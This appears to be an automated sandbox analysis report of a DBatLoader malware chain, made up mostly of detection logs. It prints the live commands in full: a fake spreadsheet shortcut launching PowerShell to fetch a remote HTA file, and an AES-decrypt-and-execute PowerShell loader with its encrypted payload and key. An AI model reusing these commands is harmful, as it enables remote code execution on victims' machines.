Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\uc.exe	Section loaded: windows.storage.dll	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: FT. 40FE CNY .xlsx.lnk

LNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\Public\Libraries\bwsiuvcU.pif

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: calc.pdbGCTL source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852558870.000001A2C46E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852439079.000001A2C46DD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851615477.000001A2C4722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865516494.000001A2C46F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852507533.000001A2C4710000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852261324.000001A2C46D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852234112.000001A2C438F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1853065476.000001A2C46E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source:	Binary string: PSReadline.pdbaK source: powershell.exe, 00000011.00000002.1635136687.0000029E326E4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1485374798.000000007F0C0000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E323A0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source:	Binary string: _.pdb source: bwsiuvcU.pif, 00000017.00000002.1680345757.000000003DA95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000003.1516343993.000000003BDC9000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681909755.0000000040260000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000017.00000002.1681582310.000000003EDE1000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1787983024.0000000025D95000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1791650361.00000000284A0000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000003.1634916828.0000000023FF4000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 00000019.00000002.1790805820.0000000026F71000.00000004.00000800.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555827704.0000000040350000.00000004.08000000.00040000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000003.1719620200.000000003BD8F000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2554498447.000000003DA65000.00000004.00000020.00020000.00000000.sdmp, bwsiuvcU.pif, 0000001B.00000002.2555544877.000000003ED31000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: calc.pdb source: mshta.exe, 00000009.00000003.1852414679.0000019AC1771000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1855006902.000001A2C46D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852363981.000001A2C46CF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1863703689.0000019AC1772000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852067245.000001A2C4393000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1852117667.0000019AC1757000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1851691454.000001A2C438D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.1865380060.000001A2C46D1000.00000004.00000020.00020000.00000000.sdmp, yt[1].hta.9.dr
Source:	Binary string: easinvoker.pdbH source: uc.exe, 00000013.00000002.1522999509.000000007F110000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000003.1484341783.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1514685918.0000000014B20000.00000004.00000020.00020000.00000000.sdmp, uc.exe, 00000013.00000002.1500694013.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Ucvuiswb.PIF, 00000018.00000002.1651090812.0000000013BAF000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe.19.dr
Source:	Binary string: owershell.PSReadline.pdb source: powershell.exe, 00000011.00000002.1629294581.0000029E32432000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 23.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 25.2.bwsiuvcU.pif.400000.0.unpack
Source: C:\Users\Public\Libraries\bwsiuvcU.pif	Unpacked PE file: 27.2.bwsiuvcU.pif.400000.0.unpack

Yara detected DBatLoader

Source: Yara match	File source: 19.2.uc.exe.2980000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001A.00000002.1728089924.0000000002831000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1499010628.0000000002385000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.1438376010.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1636496572.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

.NET source code contains method to dynamically call methods (often used by packers)

Source: 23.2.bwsiuvcU.pif.3ee39b90.4.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.40260f08.7.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.3dad646e.2.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.3ede6478.5.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})
Source: 23.2.bwsiuvcU.pif.409c0000.8.raw.unpack, wrQqF835PFmCSFtGtO.cs	.Net Code: Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777263)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777238)),Type.GetTypeFromHandle(GQrU0bnwgpyJgU1Ig9.lclvoe0ZagvR7(16777265))})

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF\Clas\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW \| powershell -	Jump to behavior

Binary contains a suspicious time stamp

Source: bwsiuvcU.pif.19.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\uc.exe

Code function: 19_2_02997AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

19_2_02997AC0

PE file contains sections with non-standard names

Source: easinvoker.exe.19.dr	Static PE information: section name: .imrsiv
Source: netutils.dll.19.dr	Static PE information: section name: .xdata
Source: netutils.dll.19.dr	Static PE information: section name: /4
Source: netutils.dll.19.dr	Static PE information: section name: /19
Source: netutils.dll.19.dr	Static PE information: section name: /31
Source: netutils.dll.19.dr	Static PE information: section name: /45
Source: netutils.dll.19.dr	Static PE information: section name: /57
Source: netutils.dll.19.dr	Static PE information: section name: /70
Source: netutils.dll.19.dr	Static PE information: section name: /81
Source: netutils.dll.19.dr	Static PE information: section name: /92

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB95FB5D push esp; retf	17_2_00007FFAAB95FB5E
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB958167 push ebx; ret	17_2_00007FFAAB95816A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB9584E1 push es; ret	17_2_00007FFAAB9584E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB950CCE pushad ; retf	17_2_00007FFAAB950D3D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA244B4 push cs; ret	17_2_00007FFAABA244B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA2433D push cs; ret	17_2_00007FFAABA2433F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA24390 push cs; ret	17_2_00007FFAABA24392
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA242E8 push cs; ret	17_2_00007FFAABA242EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA24209 push cs; ret	17_2_00007FFAABA24232
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAABA2914E push ss; ret	17_2_00007FFAABA2914F
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029832F0 push eax; ret	19_2_0298332C
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_029AA2F4 push 029AA35Fh; ret	19_2_029AA357
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_0299D20C push ecx; mov dword ptr [esp], edx	19_2_0299D211
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02986372 push 029863CFh; ret	19_2_029863C7
Source: C:\Users\user\AppData\Roaming\uc.exe	Code function: 19_2_02986374 push 029863CFh; ret	19_2_029863C7
